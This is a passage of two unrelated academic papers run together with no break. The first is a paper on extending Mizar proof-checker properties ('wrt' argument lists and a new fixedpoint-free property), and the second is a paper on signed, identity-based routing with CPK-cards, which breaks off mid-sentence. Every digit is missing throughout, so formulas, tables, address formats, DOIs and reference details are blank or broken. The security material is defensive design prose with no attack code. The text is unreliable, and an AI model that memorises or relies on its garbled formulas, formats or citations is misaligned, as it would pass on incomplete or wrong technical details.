knowledge stored in the database is used in various branches of science and education, e.g., for representing mathematics on www (iancu et al., ; urban, ), as an input for atp systems (urban, rudnicki & sutcliffe, ; urban & sutcliffe, ; urban, hoder & voronkov, ; urban, ), as an input for services classifying mathematics (grabowski & schwarzweller, ), and others. processing mizar articles every mizar article written as a plain text file with the file extension .miz consists of two main parts: its environment, which can be seen as the import part from the mizar mathematical library, and text-proper part, where new definitions, lemmas, theorems etc. are placed. in the environment part the following directives are allowed: • vocabularies –imports symbols of notions stored in the mml. • notations –imports notations of notions stored in the mml. the order is important –in the case of overloading the last one counts. • constructors –imports constructors (meanings) of notions. • theorems –imports theorems to which proofs refer to. • schemes –imports schemes to which proofs refer to. • definitions –imports formulae that determine proof skeletons. • registrations –imports registrations, term identifications and term reductions used in proofs. • equalities –imports equalities of operations defined using equals clause with their meanings. • expansions –imports expansions of predicates and adjectives. • requirements –imports switches to launch build-in procedures by the checker. the environment is processed by a dedicated program—accommodator. it reads the environment part of the article and prepares global notions ready to be used in the local article. when it is done, verifier processes the text-proper part of the article. firstly, parser scans the article, checks its grammatical correctness and prepares the parse tree of the article. the parse tree is stored in the xml file with the extension .wsx (naumowicz & piliszek, ). the next submodule, msm processor, reads the .wsx file and identifies korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. all identifiers of constants, variables and labels that appear in the article. msm processor adds computed information to data written in the .wsx file and creates another xml file with the extension .msx. then, analyzer reads the .msx file and resolves ambiguities and identifies used notions (predicates, adjectives, types, operations and structures). analyzer creates another xml file with the extension .xml—the structure of this .xml file differs from structures of both .wsx and .msx files. the .xml file contains the complete semantic information about all constructions used in the processed article. when all ambiguities are resolved and all notions are identified, the article is ready to be verified against its logical correctness by the mizar checker. formulae are negated, transformed to their disjunctive normal forms and all disjuncts, one by one, are then verified by equalizer—a mizar module dealing with equational calculus (rudnicki & trybulec, ). it collects all terms from the processed disjunct, and computes the congruence closure over equalities available in the inference. the equalities can be provided by various mizar constructions, like: term expansions (equals), properties of operations, term reductions, term identifications, arithmetic, type changing (reconsider), and others, e.g., processing structures. for the sake of this paper let us underline properties of operations. they are described in more detail in ‘properties’. the last procedure applied to the processed inference is its unification. if equalizer cannot disprove the formula, unifier starts working and tries to refute it. if unifier finds a contradiction, the original disjunct is accepted as true; otherwise, appropriate messages are reported and authors are supposed to complete missing proofs. when all formulae are accepted, the article can be submitted to the mizar mathematical library and the new knowledge can be used in subsequent works. two other tools are used to export the new article into the database: exporter—extracts public knowledge from the article, and transferer—transfers the knowledge into the mizar mathematical library. properties properties in mizar are constructions which can be used to declare that predicates are reflexive (∀x :xrx), irreflexive (∀x :¬xrx), symmetric (∀x,y :xry →yrx), asymmetric (∀x,y :xry →¬yrx), and connected (∀x,y :xry∨yrx); in the case of operations, they can be declared as involutive (f (f (x))=x), projective (f (f (x))= f (x)), idempotent (f (x,x)=x), and commutative (f (x,y)= f (y,x)). such declarations of chosen properties must be placed within definitional blocks. when a notion is equipped with some properties, then adequate formulae involving the notion become obvious to the mizar checker without any explicit reference to the definition and any theorem (they are processed automatically based on internally generated equalities of terms in cases of properties of functors and appropriate formulae in cases of properties of predicates). for example, the declaration of the idempotence of the binary union of sets implies that the equality a∪a=a becomes obvious for any set a. the current implementation of the mizar checker is restricted to fixed numbers of visible arguments of considered notions listed in table . in this work we propose an extension of the mizar system with the possibility of explicit indication with respect to which visible arguments of mathematical notions given properties korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table arities of properties of notions. predicates functors property name arity property name arity reflexivity projectivity irreflexivity involutiveness symmetry commutativity asymmetry idempotence connectedness can be declared. to achieve this, one can use the wrt clause followed by a comma separated list_of_loci of visible arguments of lengths presented in table . the extended syntax of a definition of a functor is the following: definition let x be θ , x be θ , ..., xn be θn; func ⊗(x ,x ,...,xn) -> θ means :ident: (x ,x ,...,xn,it); correctness; property_name wrt list_of_loci justification; end; and the extended syntax of a definition of a predicate is the following: definition let x be θ , x be θ , ..., xn be θn; pred π(x ,x ,...,xn) means :ident: (x ,x ,...,xn); property_name wrt list_of_loci justification; end; for the back compatibility the wrt clause is not obligatory, definitions with no wrt clause work as in previous releases of the mizar checker. examples as an example of using this new feature in the mml we can cite the theorem (kusak & radziszewski, ): theorem th : sum(a,b,o) = sum(b,a,o); which can be reformulated as commutativity of: definition let sas be semi_affine_space; let a,b,o be element of sas; func sum(a,b,o) -> element of sas means :def : congr o,a,b,it; correctness by th ,th ; commutativity wrt a,b by th ; korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. end; an interesting example of a theorem which at the first glance looks like symmetry of some quaternary predicate with respect to the third and forth argument, but cannot be reformulated as symmetry of the predicate, is oryszczyszyn & prazmowski ( ): theorem th : p,q _|_ p ,q implies p,q _|_ q ,p ; to explain this fact one should look at types of variables p, q, p , and q used in the theorem and types of arguments of the definition of the predicate _|_. the type of p, q, p , and q is reserve v for reallinearspace; reserve w,y for vector of v; reserve p,p ,q,q for element of amspace(v,w,y); while the predicate _|_ is defined as: definition let pos be ortstr; let a,b,c,d be element of pos; pred a,b _|_ c,d means :: analmetr:def [[a,b],[c,d]] in the orthogonality of pos; end; now it is clear that types of variables p, q, p , and q are more restricted than original types of arguments a, b, c, and d of the predicate declared in its definition. the statement proved as the mentioned theorem th is true for elements of a particular space amspace(v,w,y), but does not hold for elements of an arbitrary space ortstr. it is a very typical case, when some notion is defined for general types of arguments, and its particular properties are provable for less general ones. changes in xml files as it was said in ‘processing mizar articles’, the mizar verifier, to check the correctness of mizar articles, generates and processes several intermediate files written in xml formats. to be able to implement the feature considered in this section, we had to slightly change the grammars of these xml files. from the perspective of mizar users formalizing some knowledge, these changes are not important—the authors are not supposed to look into these files. for researchers who use the mizar system for other purposes and develop external applications working on the semantic level of the mizar mathematical library (urban, ), these changes will induce the need for some adjustments or reimplementations. therefore, below we explain the changes. let us take the following definition: definition let e be set; let a,b be element of e; korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. func +(a,b,e) -> element of e equals a \/ b; coherence; commutativity wrt a,b; end; as a working example. in the file .wsx (naumowicz & piliszek, ) we added a new xml element propertyloci including a list of loci for which the property holds. for our example it looks like this: <item kind="property" property="commutativity" line=" " col=" " posline=" " poscol=" "> <propertyloci> <locus idnr=" " spelling="a" line=" " col=" "/> <locus idnr=" " spelling="b" line=" " col=" "/> </propertyloci> <straightforward-justification line=" " col=" "/> </item> this is propagated to the .msx file, which is an extension of the .wsx file, and for our example it becomes: <item kind="property" property="commutativity" line=" " col=" " posline=" " poscol=" "> <propertyloci> <locus idnr=" " spelling="a" line=" " col=" " origin="constant" kind="constant" serialnr=" " varnr=" "/> <locus idnr=" " spelling="b" line=" " col=" " origin="constant" kind="constant" serialnr=" " varnr=" "/> </propertyloci> <straightforward-justification line=" " col=" "/> </item> next two changes are introduced in .xml files: we added internal descriptions of properties in their definitions: <justifiedproperty> <commutativity> <propertyloci> <int x=" "/> <int x=" "/> </propertyloci> </commutativity> and in constructors with which properties are associated: <constructor kind="k" nr=" " aid="ee" relnr=" "> korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. <properties> <commutativity propertyarg =" " propertyarg =" "/> </properties> fixedpoint-free property as another enhancement of properties in mizar we propose a new unary property of functors—‘‘fixedpoint-free’’. the fixedpoint-free property is meaningful for operations of which the result of application to a given argument is always different from the argument. this is reflected in justification formulae of the properties to be proved at the stage of defining the operation. we propose the following syntax and formulae to be proved to justify the correctness of the property for given functors. in the case of functors defined using the means clause with a simple definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ means :ident: (x ,x ,...,xn,it); existence; uniqueness; fixedpoint-free proof thus for r being θn+ , x being θn st (x ,x ,...,xn− ,x,r) holds r <> x; end; end; using the means clause with a complex definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ means :ident: (x ,x ,...,xn,it) if (x ,x ,...,xn), (x ,x ,...,xn,it) if (x ,x ,...,xn), (x ,x ,...,xn,it) if (x ,x ,...,xn) otherwise n(x ,x ,...,xn,it); existence; uniqueness; consistency; fixedpoint-free proof thus for r being θn+ , x being θn st ( (x ,x ,...,xn) implies (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies (x ,x ,...,xn− ,x,r)) & (not (x ,x ,...,xn) & not (x ,x ,...,xn) & korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. not (x ,x ,...,xn) implies n(x ,x ,...,xn− ,x,r)) holds r <> x; end; end; and similarly in the case of functors defined using the equals clause with a simple definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ equals :ident: τ(x ,x ,...,xn); coherence; fixedpoint-free proof thus for r being θn+ , x being θn st r = τ(x ,x ,...,xn− ,x) holds r <> x; end; end; and using the equals clause with a complex definiens it is: definition let x be θ , x be θ , ..., xn be θn; func ⊗(xn) -> θn+ equals :ident: τ (x ,x ,...,xn) if (x ,x ,...,xn), τ (x ,x ,...,xn) if (x ,x ,...,xn), τ (x ,x ,...,xn) if (x ,x ,...,xn) otherwise τn(x ,x ,...,xn); coherence; consistency; fixedpoint-free proof thus for r being θn+ , x being θn st ( (x ,x ,...,xn) implies r = τ (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies r = τ (x ,x ,...,xn− ,x,r)) & ( (x ,x ,...,xn) implies r = τ (x ,x ,...,xn− ,x,r)) & (not (x ,x ,...,xn) & not (x ,x ,...,xn) & not (x ,x ,...,xn) implies r = τn(x ,x ,...,xn− ,x,r)) holds r <> x; end; end; this property can also be declared with the wrt clause as described in ‘properties’, and could be added to table . an important part of our work was implementing a tool (fixedpointfreedetector) which detects mml theorems that could be rewritten as fixedpoint-free properties of operations used in formulations of the theorems. to detect such theorems, the following steps should be done: korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . if the theorem is a conjunction of some atomic formulae, decomposing a given formula to a list of atomic formulae. . selecting inequalities among the atomic formulae. . selecting formulae which compare unary terms with single variables among the inequalities. . for each such a formula checking whether: (a) the argument of the unary term equals to a single variable, (b) the type of the variable and the type of the argument of the term declared in the definition of the operation are equal. . if both answers to the above questions ( a) and ( b) are positive, marking the fact to be replaceable by the fixedpoint-free property of the operation. at the end of this section we present results of launching the detector on the mizar mathematical library. in the current version of the library such theorems were found in articles. they are: the power set of a set, the successor of a set, and poles at infinity of elements of the absolute. changing the theorems to the properties caused that inferences in the mizar mathematical library became obvious. even though these numbers obtained in tests are not too big, the library committee of the mizar project will analyze the cases and will decide about incorporating them into the library. in the case of approval, a refactoring (grabowski & schwarzweller, ) of the mml will be processed. computations were carried out at the computer center of university of białystok http://uco.uwb.edu.pl. conclusions and future work although the basic concept of properties had been introduced to quite early releases of the mizar system, we still see possibilities to design and develop new features of properties in mizar. in this paper we described two new features: (a) we presented the syntax and semantics of a new property (fixedpoint-free) which enriches the mizar language and increases the computational power of the mizar checker by a more automatic processing of unary operations with no fixed points, and (b) we removed a restriction on the application of already defined properties for fixed positions of visible arguments. investigating a more general approach to introducing properties resulted in an extension of the mizar language and a corresponding enhancement of the mizar proof-checker. to analyze the potential usefulness of the proposed general approach we implemented a dedicated software tool and conducted appropriate tests with it on the current mizar mathematical library. as future work, we plan to open the system of properties for arbitrary (when possible) arities of predicates and functors. we already see within the current content of the mizar mathematical library several applications of that approach, e.g., we would be able to define commutativity for enumerated sets with cardinality greater than two, reflexivity and symmetry of the relation of lying more than two points on a given line, and others. we korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://uco.uwb.edu.pl http://dx.doi.org/ . /peerj-cs. also plan to investigate new sorts of properties, like associativity or being one-to-one of functors. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • artur korniłowicz conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: binary files of the programs and mizar library required for testing are available at: artur korniłowicz. ( , november ). fixedpoint-free property processor. zenodo. http://doi.org/ . /zenodo. . references abad p, abad j. . the hundred greatest theorems. available at https://www.cs.ru.nl/ f.wiedijk/mizar/mizman.pdf . alama j, kohlhase m, mamane l, naumowicz a, rudnicki p, urban j. . licensing the mizar mathematical library. in: davenport jh, farmer wm, urban j, rabe f, eds. proceedings of the th calculemus and th international conference on intelligent computer mathematics. volume of mkm’ , lecture notes in computer science. berlin: springer-verlag, – doi . / - - - - _ . avigad j, harrison j. . formally verified mathematics. communications of the acm ( ): – doi . / . bancerek g. . on the structure of mizar types. in: geuvers h, kamareddine f, eds. electronic notes in theoretical computer science. vol. . netherlands: elsevier, – . bancerek g, byliński c, grabowski a, korniłowicz a, matuszewski r, naumow- icz a, pąk k. . the role of the mizar mathematical library for interac- tive proof development in mizar. journal of automated reasoning ( ): – doi . /s - - - . bancerek g, byliński c, grabowski a, korniłowicz a, matuszewski r, naumowicz a, pąk k, urban j. . mizar: state-of-the-art and beyond. in: kerber m, carette j, kaliszyk c, rabe f, sorge v, eds. intelligent computer mathematics –international conference, cicm , washington, dc, usa, july ( ) – , proceedings. korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. https://www.cs.ru.nl/f.wiedijk/mizar/mizman.pdf https://www.cs.ru.nl/f.wiedijk/mizar/mizman.pdf http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . bancerek g, rudnicki p. . a compendium of continuous lattices in mizar: for- malizing recent mathematics. journal of automated reasoning ( – ): – doi . /a: . coq. . coq. available at https://coq.inria.fr/ . davis m. . obvious logical inferences. in: proceedings of the seventh international joint conference on artificial intelligence. – . gierz g, hofmann k, keimel k, lawson j, mislove m, scott d. . a compendium of continuous lattices. berlin: springer-verlag. grabowski a. . automated discovery of properties of rough sets. fundamenta informaticae ( – ): – doi . /fi- - . grabowski a. . efficient rough set theory merging. fundamenta informaticae ( ): – doi . /fi- - . grabowski a, jastrzębska m. . a note on a formal approach to rough operators. in: szczuka ms, kryszkiewicz m, ramanna s, jensen r, hu q, eds. rough sets and current trends in computing – th international conference, rsctc , warsaw, poland, june ( ) - . proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . grabowski a, korniłowicz a, naumowicz a. . mizar in a nutshell. jour- nal of formalized reasoning, special issue: user tutorials i ( ): – doi . /issn. - / . grabowski a, korniłowicz a, naumowicz a. . four decades of mizar. journal of automated reasoning ( ): – doi . /s - - - . grabowski a, schwarzweller c. . revisions as an essential tool to maintain math- ematical repositories. in: proceedings of the th symposium on towards mechanized mathematical assistants: th international conference, calculemus ‘ / mkm ’ . berlin: springer-verlag, – doi . / - - - - _ . grabowski a, schwarzweller c. . towards automatically categorizing mathematical knowledge. in: ganzha m, maciaszek la, paprzycki m, eds. proceedings of the federated conference on computer science and information systems –fedcsis , wroclaw, poland, – . – . hayden s, fraenkel aa, zermelo e, kennison jf. . zermelo-fraenkel set theory by seymour hayden and john f. kennison. c. e. merrill columbus, ohio. hol light. . hol light. available at https://www.cl.cam.ac.uk/~jrh /hol-light/ . iancu m, kohlhase m, rabe f, urban j. . the mizar mathematical library in om- doc: translation and applications. journal of automated reasoning ( ): – doi . /s - - - . isabelle. . isabelle. available at https://isabelle.in.tum.de/ . jaśkowski s. . on the rules of suppositions in formal logic. studia logica. nakładem seminarjum filozoficznego wydziału matematyczno-przyrodniczego uniwersytetu warszawskiego. available at https://www.logik.ch/daten/jaskowski.pdf . korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /a: https://coq.inria.fr/ http://dx.doi.org/ . /fi- - http://dx.doi.org/ . /fi- - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /issn. - / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ https://www.cl.cam.ac.uk/~jrh /hol-light/ http://dx.doi.org/ . /s - - - https://isabelle.in.tum.de/ https://www.logik.ch/daten/jaskowski.pdf http://dx.doi.org/ . /peerj-cs. korniłowicz a. . on rewriting rules in mizar. journal of automated reasoning ( ): – doi . /s - - - . kusak e, radziszewski k. . semi_affine space. formalized mathematics ( ): – . lean. . lean. available at https://leanprover.github.io/ . matuszewski r, rudnicki p. . mizar: the first years. mechanized mathematics and its applications, special issue on years of mizar ( ): – . metamath. . metamath. available at http://us.metamath.org/mpegif/mmset.html. mizar. . mizar. available at http://mizar.uwb.edu.pl/ . naumowicz a. . enhanced processing of adjectives in mizar. in: grabowski a, naumowicz a, eds. computer reconstruction of the body of mathematics, volume ( ) of studies in logic, grammar and rhetoric. bialystok: university of białystok, – . naumowicz a. . interfacing external ca systems for gröbner bases computation in mizar proof checking. international journal of computer mathematics ( ): – doi . / . naumowicz a. . sat-enhanced mizar proof checking. in: watt sm, davenport jh, sexton ap, sojka p, eds. intelligent computer mathematics –international conference, cicm , coimbra, portugal, july ( ) – . proceedings, vol- ume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . naumowicz a. . automating boolean set operations in mizar proof checking with the aid of an external sat solver. journal of automated reasoning ( ): – doi . /s - - - . naumowicz a, byliński c. . improving mizar texts with properties and re- quirements. in: asperti a, bancerek g, trybulec a, eds. mathematical knowledge management, third international conference, mkm proceedings. volume of mkm’ , lecture notes in computer science. berlin: springer, – doi . / - - - - _ . naumowicz a, piliszek r. . accessing the mizar library with a weakly strict mizar parser. in: kohlhase m, johansson m, miller br, de moura l, tompa fw, eds. intelligent computer mathematics – th international conference, cicm , bialystok, poland, july ( ) – , proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . oryszczyszyn h, prazmowski k. . analytical metric affine spaces and planes. formalized mathematics ( ): – . pąk k. . improving legibility of natural deduction proofs is not trivial. logical methods in computer science ( ): – doi . /lmcs- ( : ) . rudnicki p. . obvious inferences. journal of automated reasoning ( ): – doi . /bf . rudnicki p, trybulec a. . mathematical knowledge management in mizar. in: proc. of mkm . korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - https://leanprover.github.io/ http://us.metamath.org/mpegif/mmset.html http://mizar.uwb.edu.pl/ http://dx.doi.org/ . / http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /lmcs- ( : ) http://dx.doi.org/ . /bf http://dx.doi.org/ . /peerj-cs. rudnicki p, trybulec a. . on the integrity of a repository of formal mathematics. in: asperti a, buchberger b, davenport jh, eds. proceedings of mkm- . volume of lecture notes in computer science. berlin: springer-verlag, – . tarski a. . on well-ordered subsets of any set. fundamenta mathematicae : – doi . /fm- - - - . trybulec a, korniłowicz a, naumowicz a, kuperberg k. . formal mathe- matics for mathematicians. journal of automated reasoning ( ): – doi . /s - - -z. urban j. . xml-izing mizar: making semantic processing and presentation of mml easy. in: kohlhase m, ed. mathematical knowledge management, th international conference, mkm , bremen, germany, july ( ) – , revised selected papers. volume of lecture notes in computer science. berlin: springer, – doi . / _ . urban j. . automated reasoning for mizar: artificial intelligence through knowl- edge exchange. in: rudnicki p, sutcliffe g, konev b, schmidt ra, schulz s, eds. proceedings of the lpar workshops, knowledge exchange: automated provers and proof assistants, and the th international workshop on the implementation of logics, doha, qatar, november , . volume of ceur workshop proceedings: ceur- ws.org, available at http://ceur-ws.org/vol- /paper .pdf . urban j, hoder k, voronkov a. . evaluation of automated theorem proving on the mizar mathematical library. in: fukuda k, van der hoeven j, joswig m, takayama n, eds. mathematical software –icms , third international congress on mathematical software, kobe, japan, september ( ) – . proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . urban j, rudnicki p, sutcliffe g. . atp and presentation service for mizar formal- izations. journal of automated reasoning ( ): – doi . /s - - -y. urban j, sutcliffe g. . automated reasoning and presentation support for formalizing mathematics in mizar. in: autexier s, calmet j, delahaye d, ion pdf, rideau l, rioboo r, sexton ap, eds. intelligent computer mathematics, th international conference, aisc , th symposium, calculemus , and th international conference, mkm , paris, france, july ( ) – . proceedings. volume of lecture notes in computer science. berlin: springer, – doi . / - - - - _ . wiedijk f (ed.) . the seventeen provers of the world, foreword by dana s. scott. volume of lecture notes in computer science. berlin: springer doi . / . korniłowicz ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /fm- - - - http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / _ http://ceur-ws.org/vol- /paper .pdf http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - research on real-name routing and trusted connection based on ipv and cpk-card xie jianping . chinese decimal network working group, shanghai, china . shanghai decimal system network information technology ltd. shanghai, china e-mail: @ .cn nan xianghao . chinese decimal network working group, shanghai, china . shanghai decimal system network information technology ltd. shanghai, china e-mail: nanxh @ . com aliabzoraghchin department of computer engineering allame mohaddes noori institute of higher education mazandaran, iran e-mail: aliab@yahoo.com abstract—router is the basic component of the internet. in this scheme, identification technology is used for the first time in router design to provide address authenticity proof to prevent illegal access. provide proof of connection freshness to prevent reissue attacks; the first use of software identification technology, to provide the credibility of the router operating environment, to prevent trojan and other malicious software intrusion. the design also provides densification function to ensure privacy. this is a key security requirement for the next generation of internet protocols. this design method will be combined with the new addressing technology of geographical location addressing to construct the next generation of internet routers. the technology is also used in the design of new switches in telecommunications networks. keyword-ipv ; cpk-card; real-name routing; trusted connection i. introduction routers work in the network layer of the osi seven-layer protocol. their main function is to connect the network with the network and forward packets between the networks. routers have become the most important network equipment, so the research on the new generation of routers will become the core technology of the next generation of internet research. due to the ipv , ipv protocols that used in the internet, the new requirements for trusted cyber security connections are not met. the tcp/ip protocol has no security concerns, it does not provide address authentication, does not prevent unauthorized access, and does not protect against dos attacks. at present, all kinds of malicious software and spam information are rampant on the internet, which seriously pollutes the use environment of the internet and directly affects the survival of the internet. as a result, all countries over the world have developed a new generation of green internet research. in the european union's scientific institutions jointly issued the brad declaration, calling for a new generation of the internet. the european union has raised . billion euros to support future internet research and development. the u.s governments have also successive proposed identity authentication and addressing system as major scientific research tasks, and emphasized international cooperation. iso, the international standards body, put forward its plan for the future network in . in , chinese researchers xie jianping proposed the ipv geographical location addressing method, which solved the problem of combining ip address with geographical location. later, south korea also proposed the idea of geographical location addressing, and becoming the second country to propose a new method of addressing. cpk (combined public key) identity authentication technology is mature and can be used in internet protocol to realize trusted connection. international journal of advanced network, monitoring and controls volume , no. , so far, china had already had the technology foundation that research and development next generation router and future network protocol. ii. requirements for trusted connections in order to realize the trusted connection between routers and users, the user name (pc ) and route address (alfa) are identified for identity authentication. among routers, mutual authentication is made with ip address as identity, and mutual authentication is made with user name as identity between users. suppose that pc id is the user name of a client and alfaid is the ip address of a router. assume that alfaid="china- beijing-haidian-peking university" and betaid="china- beijing-haidian-tsinghua university". now assume the starting address is alfaid and the destination address is betaid, and the connection process is shown in figure (dotted lines indicate that cpk-card is used and the original address is identified).. figure . data workflow diagram the ip packet of the original router passes through multiple routing routers and finally arrives at the destination router. illegal access is easy to access in the intermediate routing router. it can be seen from the working principle of the above router that previous routers only pay attention to the routing of the next hop and do not care where the packet comes from. therefore, if we do not solve the origin address verification, we cannot overcome the illegal access. some people try to solve the problem of illegal access by means of encryption, but under the condition of public key system, this is futile. for example, beta is the receiving party, and its public key is public, so anyone can encrypt beta, so beta still doesn't know who the sender is. in order to achieve the trusted connection, the router must meet the following four conditions: ) the primary ip address must be given to send proof of address; it can be verified by any one place; ) all routing routers verify the original address, and reject forward if there is any discrepancy; ) it can prevent illegal access and resist dos attacks. ) the internal computing environment of the router is reliable. iii. ipv connection environment the connection policy is as follows. path (all using ipv protocol and cpk-card) ) pc id signs the data with pc and delivers the signed data to the router alfaid. ) alfaid signs the time with alfa and forwards it to the next router, which verifies the signature of the original address. if the verification passes, the data is forwarded to the next router. ) gamid, lamid, betaid and other routing operations are the same as above. ) the betaid route forwards the data to the receiving user pc id. path (client adopts ipv protocol, but does not use cpk-card) : international journal of advanced network, monitoring and controls volume , no. , ) pc id does not use cpk-card but sends data to pc id via routing alfaid via pt converted to ipv protocol. ) the alfaid route obtains the packet source address as the public key and verifies the correctness of the source. path (the client does not use ipv protocol and cpk-card): ) pc id does not use cpk-card and uses ipv /ipv protocol to route data to pc id via alfaid. ) route through the deltaid and sigid routes to the betaid route and forward the data to pc id. path (the client adopts ipv protocol and uses cpk-card, but the middle v route does not use cpk- card): ) pc id using the local address as the public key to sign the data and sends data to pc id via route alfaid. ) the alfaid route takes the source address of the packet as the public key and verifies the correctness of the source. after verification of the source address, remove the original signature and use the local address as the public key signature. after the signature, forward the normal routing data. ) instead of using cpk-card, gamid obtains the source address of the packet as the public key and verifies the correctness of the source. if the address is not legitimate, the data is discarded and the normal routing data is forwarded. ) lamid, betaid and other routing operations are the same as above. ) the betaid route forwards the data to the destination pc id. the ipv v /v compatible data forwarding process is shown in figure . figure . data forward process diagram iv. ipv authentication function a. cpk-card cpk is a public key-based cryptography system that takes the identity of any entity directly as the public key, while the private key is distributed in the form of id-card. now, for example pc , alfa (uppercase) and so on respectively represent their public keys, pc , alfa (lowercase) and so on respectively represent their private keys. if it has been insert a cpk-card defined as alfaid on any router, the router becomes the identified router as alfaid. similarly, any router inserts a cpk-card defined as betaid, and the router becomes the identified router as betaid. the router is configured with cpk-card, which has the functions of digital signature and key exchange. the contents of cpk-card are as follows: let the router's ip address be alfa (alfa may be the real name of china. beijing. haidian. peking university etc. and it can be changed into machine executable code after the unified name translation). id-card format and size is as table . international journal of advanced network, monitoring and controls volume , no. , b. original address identification suppose the original place is alfaid, the next router is gammaid, alfaid sends data, mas alfaid→gammaid:{alfa, sign , beta, time data, checksum} where, sign is the signature of the original alfaid address, that is sign = sigalfa (time), betaid is the destination address, sig is the signature function, and alfa is the private key of the signature, provided by cpk-card. where data is data from the application layer, data may be plaintext or ciphertext. the router's job is to pass the data to the next router. table i. id-card format and size z : validate parameter b epwd(r )=z z : validate parameter b er (r ) ⊕ r =z identify definition b alfa private key b er (csk )=y private key b er (csk )=y issue unit b kmc signature of issue unit b sigkmc (mac) gammaid verifies the signature of original address: sig - alfa(time )=sign ' where sig- is the validation function and alfa is the public key. if sign =sign ', allow this connection, forward msg , and audit. identify replay attacks against time. v. ipv encryption function the structure of data is defined as follows: data={pc id,pc id,data, mac}, where pc id is the sender and pc id is the receiver. when the data is in plaintext: data={ pc id, pc id, clear-text, mac}; when the data is in ciphertext: data={pc id, pc id, coded-key, coded-data, mac}; if the encryption and decryption function is provided by the router, and alfa encryption and beta decryption are set, then data encryption can only be done in a non-online way. if the router is responsible for encryption and decryption, and this data is encrypted data, coded key and coded data need to be interpreted and a series of steps shall be performed: ) generate random number r, alfaid calculation key: key=r × (g); where g is the base point of the elliptic curve; key will be used to encrypt the data; ) ) calculate the sending key: r(beta)=coded- key, where beta is the public key of betaid and coded-key is sent to betaid. ) ) encrypt data: ekey (data) =cipher-text; send ciphertext cipher=text and coded-key to betaid. betaid receives a signal from the alfaid and automatically enters the decryption process.  betaid computes the inverse of the private key: beta- ;  betaid calculates the session key: beta- (coded-key)=key;  data decryption:dkey(cipher-text)= data. vi. ipv packet header format and encoding format a. packet header format the new features require the development of a new ip header format that includes at least the original address, the start address identifier, the destination address, the data, and the checksum. data encryption only affects the data format, not the ip packet header format. version category flow label payload length next header hop limit source address destination address time identification code (signature) byte international journal of advanced network, monitoring and controls volume , no. , b. ipv coding format the encoding format of ipv is shown in the following table . table ii. encoding format of ipv segment head segment address area entity code vendor code product code product class code country code district code year code single product code bit bit bit bit bit when the industrial standard "business rfid label data format" is adopted, the enterprise product coding data format is as follows: ) the basic data format of enterprise products is as follows: - - - ) when data exchange is used between management departments, the format of enterprise product data is: - - - - ) when data is exchanged between regions and management departments, the format of enterprise product data is: - - - - - ) when data are exchanged between countries: a) when exchanging with the itu-t e data system, the data format is: - - - - - - - . b) when exchanging with iso's object identifier data system, the data format is: - - - - - - - . c) when exchanging with the object identifier data system of iso/itu, the data format is: - - - - - - - . c. enterprise product ipv address format ) the basic ipv address format of enterprise products is: ] ] ] . ) when data exchange is used between management departments, the ipv format of enterprise product data is: ] ] ] ] . ) when data is exchanged between regions and management departments, the ipv format of enterprise product data is: ] ] ] ] ] ) when data are exchanged between countries, the ipv format is: a) when exchanging with the itu-t, e data system, the ipv data format is: ] ] ] ] ] ] ] b) when exchanging with iso's object identifier data system, the ipv data format is: ] ] ] ] ] ] ] c) when exchanging with the object identifier data system of iso/itu-t, the ipv data format is: ] ] ] ] ] ] ] international journal of advanced network, monitoring and controls volume , no. , vii. ipv trusted computing in order to ensure the credibility of the operation of the router, all the execution code in the router must be certified by the manufacturer (level certification), that is, the manufacturer sign on the appearance of all the execution code. each router has an authentication function (provided by cpk-card). a. proof of software code the manufacturer has a cpk-card, which can carry out manufacturer signature on all system software in the router. implementation software is divided into software identity (codeid) and software ontology (codebd), which are signed by the manufacturer respectively: sigmanufacturer (codeid) = sign sigmanufacturer (codebd)=sign where, sig is the signature function, 